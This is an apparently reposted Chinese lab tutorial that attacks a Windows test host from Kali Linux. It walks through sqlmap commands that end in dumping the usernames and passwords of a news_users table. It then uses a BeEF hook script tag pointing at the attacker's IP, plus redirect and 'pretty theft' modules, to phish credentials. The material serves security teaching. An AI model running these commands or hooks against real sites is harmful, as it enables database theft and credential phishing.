网络安全:Kali Linux 进行SQL注入与XSS漏洞利用

这篇具有很好参考价值的文章主要介绍了网络安全:Kali Linux 进行SQL注入与XSS漏洞利用。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

目录

一、实验

1.环境

2.Kali Linux 进行SQL注入

3.Kali Linux 进行XSS漏洞利用

二、问题

1.XSS分类

2.如何修改beef-xss的密码

3.beef-xss 服务如何管理

4.运行beef报错

5.beef 命令的颜色有哪些区别

6.owasp-top-10 有哪些变化


一、实验

1.环境

(1)主机

表1  主机

系统 版本 IP 备注
Kali Linux 2022.4

192.168.204.154(动态)

Windows 10 192.168.204.10 Kali(2022.4)的目标主机

(2)查看Kali Linux (2022.4)系统版本

cat /etc/os-release

linux sql漏洞,网络安全,web安全,linux,xss,运维,安全

(3) 查看Kali Linux (2022.4)系统IP地址

ip addr | grep 154

linux sql漏洞,网络安全,web安全,linux,xss,运维,安全

(4)Windows 查看IP地址

ipconfig

linux sql漏洞,网络安全,web安全,linux,xss,运维,安全

(5)Kali主机 ping Windows主机

ping  192.168.204.10

linux sql漏洞,网络安全,web安全,linux,xss,运维,安全

2.Kali Linux 进行SQL注入

(1) LAMP(LNMP)平台

选择Windows版本

https://www.xp.cn/download.html

(2)sqlmap查阅

https://github.com/sqlmapproject/sqlmap

(3)获取服务器信息

包括操作系统、数据库、 web 容器、后端语⾔

sqlmap -u http://192.168.204.10/news/list.php?id=46

linux sql漏洞,网络安全,web安全,linux,xss,运维,安全linux sql漏洞,网络安全,web安全,linux,xss,运维,安全

(4)获取数据名称列表

--thread 10  线程数设置为10

sqlmap -u http://192.168.204.10/news/show.php?id=46 --thread 10 -dbs

linux sql漏洞,网络安全,web安全,linux,xss,运维,安全

(5)获取当前数据库名称

sqlmap -u http://192.168.204.10/news/show.php?id=46 --current-db

linux sql漏洞,网络安全,web安全,linux,xss,运维,安全

(6)获取当前数据库中所有表的名称

sqlmap -u http://192.168.204.10/news/show.php?id=46 -D news --tables

linux sql漏洞,网络安全,web安全,linux,xss,运维,安全

(7)获取当前数据库指定的表的字段名

sqlmap -u http://192.168.204.10/news/show.php?id=46 -D news -T news_users --columns

linux sql漏洞,网络安全,web安全,linux,xss,运维,安全

(8)获取指定库指定表指定字段的值

sqlmap -u http://192.168.204.10/news/show.php?id=46 -D news -T news_users -C username,password --dump

linux sql漏洞,网络安全,web安全,linux,xss,运维,安全

3.Kali Linux 进行XSS漏洞利用

(1)漏洞测试平台

选择Windows版本

https://github.com/zhuifengshaonianhanlu/pikachu

(2)kali 系统更新

sudo apt-get update

linux sql漏洞,网络安全,web安全,linux,xss,运维,安全

(3)安装ruby

apt-get install ruby

linux sql漏洞,网络安全,web安全,linux,xss,运维,安全

(4)安装beef

apt-get install beef-xss 

linux sql漏洞,网络安全,web安全,linux,xss,运维,安全

(5)启动beef-xss

┌──(root㉿kali)-[~]
└─# beef-xss
[-] You are using the Default credentials
[-] (Password must be different from "beef")
[-] Please type a new password for the beef user:

┌──(root㉿kali)-[~]
└─# beef-xss
[-] You are using the Default credentials
[-] (Password must be different from "beef")
[-] Please type a new password for the beef user:
[i] GeoIP database is missing
[i] Run geoipupdate to download / update Maxmind GeoIP database
[*] Please wait for the BeEF service to start.
[*]
[*] You might need to refresh your browser once it opens.
[*]
[*]  Web UI: http://127.0.0.1:3000/ui/panel
[*]    Hook: <script src="http://<IP>:3000/hook.js"></script>
[*] Example: <script src="http://127.0.0.1:3000/hook.js"></script>

● beef-xss.service - beef-xss
     Loaded: loaded (/lib/systemd/system/beef-xss.service; disabled; preset: disabled)
     Active: active (running) since Wed 2024-03-27 10:57:29 CST; 5s ago
   Main PID: 26104 (ruby)
      Tasks: 4 (limit: 2248)
     Memory: 92.8M
        CPU: 3.246s
     CGroup: /system.slice/beef-xss.service
             └─26104 ruby /usr/share/beef-xss/beef

3月 27 10:57:34 kali beef[26104]: == 24 CreateAutoloader: migrated (0.0013s) ====================================
3月 27 10:57:34 kali beef[26104]: == 25 CreateXssraysScan: migrating ============================================
3月 27 10:57:34 kali beef[26104]: -- create_table(:xssraysscans)
3月 27 10:57:34 kali beef[26104]:    -> 0.0016s
3月 27 10:57:34 kali beef[26104]: == 25 CreateXssraysScan: migrated (0.0016s) ===================================
3月 27 10:57:34 kali beef[26104]: [10:57:33][*] BeEF is loading. Wait a few seconds...
3月 27 10:57:34 kali beef[26104]: [10:57:34][!] [AdminUI] Error: Could not minify 'BeEF::Extension::AdminUI::API::Handler' JavaScript file: Invalid option: harmony
3月 27 10:57:34 kali beef[26104]: [10:57:34]    |_  [AdminUI] Ensure nodejs is installed and `node' is in `$PATH` !
3月 27 10:57:34 kali beef[26104]: [10:57:34][!] [AdminUI] Error: Could not minify 'BeEF::Extension::AdminUI::API::Handler' JavaScript file: Invalid option: harmony
3月 27 10:57:34 kali beef[26104]: [10:57:34]    |_  [AdminUI] Ensure nodejs is installed and `node' is in `$PATH` !

[*] Opening Web UI (http://127.0.0.1:3000/ui/panel) in: 5... 4... 3... 2... 1...

linux sql漏洞,网络安全,web安全,linux,xss,运维,安全

(6)浏览器登录

http://127.0.0.1:3000/ui/authentication

linux sql漏洞,网络安全,web安全,linux,xss,运维,安全

(7) 输入账号密码

账号输⼊beef,密码输⼊123456

linux sql漏洞,网络安全,web安全,linux,xss,运维,安全

进入系统

linux sql漏洞,网络安全,web安全,linux,xss,运维,安全

(8) Windows 主机设置钩子

 <script src="http://192.168.204.154:3000/hook.js"></script>

linux sql漏洞,网络安全,web安全,linux,xss,运维,安全

(9)beef获取目标主机

linux sql漏洞,网络安全,web安全,linux,xss,运维,安全

(10)查看模块

linux sql漏洞,网络安全,web安全,linux,xss,运维,安全

(11)选择重定向

linux sql漏洞,网络安全,web安全,linux,xss,运维,安全

执行 (选择Execute)

linux sql漏洞,网络安全,web安全,linux,xss,运维,安全

(12) Windows 主机页面重定向

linux sql漏洞,网络安全,web安全,linux,xss,运维,安全

(13)选择pretty theft

linux sql漏洞,网络安全,web安全,linux,xss,运维,安全

 执行 (选择Execute)

linux sql漏洞,网络安全,web安全,linux,xss,运维,安全

(14)Windows主机弹出登录界面

linux sql漏洞,网络安全,web安全,linux,xss,运维,安全

(15)beef获取账号及密码

linux sql漏洞,网络安全,web安全,linux,xss,运维,安全

二、问题

1.XSS分类

(1)类别

1)反射型XSS

2)持久型XSS
 
3)DOM型XSS

2.如何修改beef-xss的密码

(1)修改

vim /etc/beef-xss/config.yaml

linux sql漏洞,网络安全,web安全,linux,xss,运维,安全

(第7、8⾏)

linux sql漏洞,网络安全,web安全,linux,xss,运维,安全

3.beef-xss 服务如何管理

(1)开启服务

1)第一种方式
任意目录,直接输入命令:beef-xss 打开 ,过5秒左右,然后它自动会打开命令行和浏览器beef的登录框

2)第二种方式
进入/usr/share/beef-xss/,输入命令:./beef-xss 打开 ,然后手动打开浏览器链接

(2)服务管理

1)开启beef服务
systemctl start beef-xss.service      

2)关闭beef服务
systemctl stop beef-xss.service        

3)重启beef服务
systemctl restart beef-xss.service  

4.运行beef报错

(1)报错

linux sql漏洞,网络安全,web安全,linux,xss,运维,安全

(2)原因分析

需要管理员操作。

(3)解决方法

切换为管理员操作。

linux sql漏洞,网络安全,web安全,linux,xss,运维,安全

5.beef 命令的颜色有哪些区别

(1)区别

linux sql漏洞,网络安全,web安全,linux,xss,运维,安全

1)绿⾊
命令模块可以在⽬标浏览器上运⾏,且⽤户不会感到任何异常

2)灰⾊
命令模块尚未针对⽌⼀⼝此⽬标进⾏验证,不知道是否可运⾏

3)橙⾊
命令模块可以在⽬标浏览器上运⾏,但是⽤户可能会感到异常(例如弹窗、提示、跳转等)

4)红⾊
命令模块不适⽤于此⽬标

6.owasp-top-10 有哪些变化

(1)官网

http://www.owasp.org.cn/OWASP-CHINA/owasp-project/2021-owasp-top-10/

(2)变化

最近2次的变化

linux sql漏洞,网络安全,web安全,linux,xss,运维,安全文章来源地址https://www.toymoban.com/news/detail-858541.html

到了这里,关于网络安全:Kali Linux 进行SQL注入与XSS漏洞利用的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • 网络安全---SQL注入攻击

            SQL 注入是一种代码注入技术,可利用 Web 应用程序和数据库服务器之间接口中的漏洞。当用户的输入在发送到后端数据库服务器之前未在 Web 应用程序中正确检查时,该漏洞就存在。         许多 Web 应用程序从用户处获取输入,然后使用这些输入构建 SQL 查询

    2024年04月12日
    浏览(50)
  • 网络安全必学SQL注入

    SQL注入漏洞可以说是在企业运营中会遇到的最具破坏性的漏洞之一,它也是目前被利用得最多的漏洞。要学会如何防御SQL注入,首先我们要学习它的原理。 针对SQL注入的攻击行为可描述为通过在用户可控参数中注入SQL语法,破坏原有SQL结构,达到编写程序时意料之外结果的攻

    2024年02月03日
    浏览(62)
  • 【网络安全】初探SQL注入漏洞

    要想玩SQL注入,一个简单的数据交互页面是需要的,故我们用PHP做一个简易网页,有登录、注册和首页三块内容。 登录需要输入账号密码,等待提交后进入系统; 注册需要输入名字,密码,手机号,照片,等待提交后进入系统; 首页需要利用PHP和数据库联动后的查询语句,

    2024年02月16日
    浏览(42)
  • 「网络安全」SQL注入攻击的真相

    点击此处即可获得282G网络安全学习资料 我们生活在数据的黄金时代。有些公司将其分析为更好的自己,有些公司为了获利而进行交易,没有一家公司因其价值而自由放弃 - 对于他们的业务和犯罪分子。 SQL(结构化查询语言)是一种非常流行的与数据库通信的方式。虽然许多

    2024年02月07日
    浏览(49)
  • 网络安全-初学SQL注入&基本概念

    SQL语句:解释SQL(Structured Query Language)是一种用于与关系型数据库进行交互的语言。SQL语句用于执行各种数据库操作,例如插入、更新、删除和查询数据。 用户输入与SQL查询的拼接:说明应用程序通常会接受用户的输入,并将其用作构建SQL查询语句的一部分。这种拼接用户

    2024年02月13日
    浏览(43)
  • 网络安全之SQL注入及防御(下篇)

    目录 什么是SQL注入? 一,SQL注入会导致什么呢? 二,SQL注入思想与步骤 三,SQL注入的绕过 四,sqlmap工具的使用  五,sql注入的防御方法 总结 什么是SQL注入? SQL注入(SQL Injection)是一种常见的网络攻击手段,是因为应用程序对用户输入的数据验证不到位造成的。攻击者在

    2024年04月28日
    浏览(41)
  • 【网络安全】SQL注入漏洞的修复建议

    SQL注入是Web应用程序常见的安全漏洞之一,攻击者通过恶意构造的SQL查询语句,成功在应用程序的数据库中执行任意操作,导致数据泄露、篡改或其他安全问题。 本篇技术博客将详细介绍SQL注入漏洞的修复建议,包括过滤危险字符和使用预编译语句,通过具体的代码案例帮助

    2024年02月06日
    浏览(51)
  • 网络安全B模块(笔记详解)- SQL注入

    1.使用渗透机场景kali中工具扫描服务器场景,将apache的端口号和版本号作为Flag提交(格式:端口号_版本号)  Flag:8081_7.5 2.使用渗透机场景windows7访问服务器场景SQL网站,并将网站中概述页面中的Flag提交; Flag:sql_is_good 3.使用渗透机场景windows7访问服务器中的SQL网站中的数

    2024年01月20日
    浏览(48)
  • 网络安全进阶学习第九课——SQL注入介绍

    将 不受信任 的数据作为命令或查询的一部分发送到解析器时,会产生诸如SQL注入、NoSQL注入、OS 注入和LDAP注入的注入缺陷。攻击者的恶意数据可以诱使解析器在 没有适当授权 的情况下执行非预期命令或访问数据。 注入能导致 数据丢失、破坏 或 泄露给无授权方 ,缺乏可审

    2024年02月14日
    浏览(45)
  • SQL注入 ❤ ~~~ 网络空间安全及计算机领域常见英语单词及短语——网络安全(二)

    就比如登录页面,输入用户名admin和密码123456,网页告诉服务器我的用户名和密码,服务器就会去问数据库,有没有这个用户名admin并且密码为123456的用户,服务器收到数据库的回答就回去告诉网页,有这个用户就登录成功,没有就登录失败。SQL注入就是在网页告诉服务器我的

    2024年02月13日
    浏览(47)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包